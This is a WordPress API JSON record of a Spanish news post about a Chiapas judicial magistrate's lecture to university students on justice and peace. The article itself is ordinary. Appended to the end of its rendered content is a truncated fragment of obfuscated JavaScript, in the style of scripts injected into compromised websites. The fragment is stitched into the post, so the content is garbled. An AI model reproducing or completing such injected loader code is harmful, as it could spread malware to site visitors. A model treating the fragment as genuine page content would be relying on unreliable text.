{"id":23782,"date":"2025-09-05T03:17:05","date_gmt":"2025-09-05T03:17:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23782"},"modified":"2025-09-05T03:17:06","modified_gmt":"2025-09-05T03:17:06","slug":"juan-carlos-moreno-guillen-impulsa-dialogo-con-estudiantes-sobre-la-cultura-juridica-en-las-nuevas-generaciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23782","title":{"rendered":"Juan Carlos Moreno Guill\u00e9n impulsa di\u00e1logo con estudiantes sobre la cultura jur\u00eddica en las nuevas generaciones"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"23784\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316054-1024x681.jpg\" alt=\"\" class=\"wp-image-23784\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316054-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316054-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316054-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316054-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316054-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316054-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"23783\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316056-1024x681.jpg\" alt=\"\" class=\"wp-image-23783\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316056-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316056-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316056-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316056-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316056-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316056-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"23787\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316058-1024x681.jpg\" alt=\"\" class=\"wp-image-23787\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316058-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316058-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316058-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316058-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316058-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316058-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"23786\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316052-1024x681.jpg\" alt=\"\" class=\"wp-image-23786\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316052-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316052-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316052-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316052-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316052-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316052-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"23785\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316050-1024x681.jpg\" alt=\"\" class=\"wp-image-23785\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316050-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316050-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316050-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316050-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316050-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316050-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u2022\u2060 \u2060Reafirm\u00f3 que el servicio p\u00fablico y el acceso a la justicia requieren compromiso y convicci\u00f3n.<\/p>\n\n\n\n<p>4 de septiembre del 2025. En el marco de las pol\u00edticas de vinculaci\u00f3n y capacitaci\u00f3n del Poder Judicial del Estado de Chiapas, el magistrado presidente Juan Carlos Moreno Guill\u00e9n particip\u00f3 en un espacio acad\u00e9mico con estudiantes de la Universidad de Ciencias y Artes de Chiapas (Unicach), donde imparti\u00f3 la conferencia \u201cLa importancia del Poder Judicial en la Sociedad\u201d.<\/p>\n\n\n\n<p>Durante una charla amena organizada por la Facultad de Ciencias Administrativas y Tecnolog\u00edas Digitales, dirigida a j\u00f3venes de la carrera de Ciencias Pol\u00edticas y Administraci\u00f3n P\u00fablica, el magistrado presidente comparti\u00f3 su experiencia, conocimientos y an\u00e9cdotas. Ofreci\u00f3 a las y los futuros profesionales un panorama general del quehacer jurisdiccional y las implicaciones de trabajar con asuntos que impactan a la ciudadan\u00eda en los \u00e1mbitos jur\u00eddico, emocional, econ\u00f3mico o familiar.<\/p>\n\n\n\n<p>Moreno Guill\u00e9n se congratul\u00f3 por el inter\u00e9s de las y los estudiantes en profundizar en la estructura, funciones y relevancia del Poder Judicial como pilar del Estado de Derecho, as\u00ed como de mantenerse al tanto de las reformas nacionales y locales, haciendo hincapi\u00e9 en la difusi\u00f3n de la justicia alternativa y en la implementaci\u00f3n de la oralidad en las materias civil y familiar, temas que han recibido gran impulso durante su administraci\u00f3n.<\/p>\n\n\n\n<p>\u201cHay una relaci\u00f3n muy estrecha entre la justicia y la paz y por eso lo elegimos como nuestra campa\u00f1a\u201d, manifest\u00f3 el magistrado. A\u00f1adi\u00f3 que son conceptos \u00edntimamente ligados, ya que cuando se aplica la justicia adecuadamente en una comunidad, la parte ofendida puede acceder a la reparaci\u00f3n del da\u00f1o. \u201cCuando hay injusticias y delitos impunes, se genera un malestar social. Si aplicamos la justicia adecuadamente, estamos aportando para que la paz social exista\u201d.<\/p>\n\n\n\n<p>\u200bCon la participaci\u00f3n activa de estudiantes en la sesi\u00f3n de preguntas y respuestas, el magistrado presidente reafirm\u00f3 que el servicio p\u00fablico y el acceso a la justicia son cuestiones de compromiso y convicci\u00f3n. Subray\u00f3 la importancia de trabajar con empat\u00eda y de servir a la gente, manejando un modelo de comunicaci\u00f3n cercano, transparente y abierto que evidencie resultados a trav\u00e9s de sentencias y resoluciones que castiguen las acciones que vulneran los derechos fundamentales de la ciudadan\u00eda.<\/p>\n\n\n\n<p>Finalmente, en este espacio moderado por el docente investigador de la Unicach, Juan Pablo Z\u00e1rate Izquierdo; Moreno Guill\u00e9n les invit\u00f3 a reflexionar sobre los retos actuales a los que se enfrentan como comunidad universitaria. Destac\u00f3 que la participaci\u00f3n ciudadana, la cultura de la denuncia, y el trabajo de juzgadoras y juzgadores con \u00e9tica, perspectiva de g\u00e9nero y derechos humanos, fortalecen una justicia imparcial y accesible.<\/p>\n\n\n\n<p>Con este ejercicio, el Poder Judicial del Estado reafirma su compromiso de acercarse a todos los sectores de la sociedad, reconociendo que la formaci\u00f3n de nuevas generaciones es fundamental para consolidar una justicia con enfoque humanista, fomentando la conciliaci\u00f3n y el di\u00e1logo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022\u2060 \u2060Reafirm\u00f3 que el servicio p\u00fablico y el acceso a la justicia requieren compromiso y convicci\u00f3n. 4 de septiembre del 2025. En el marco de las pol\u00edticas de vinculaci\u00f3n y capacitaci\u00f3n del Poder Judicial del Estado de Chiapas, el magistrado presidente Juan Carlos Moreno Guill\u00e9n particip\u00f3 en un espacio acad\u00e9mico con estudiantes de la Universidad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23784,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23782","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23782","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23782"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23782\/revisions"}],"predecessor-version":[{"id":23788,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23782\/revisions\/23788"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23784"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23782"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23782"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}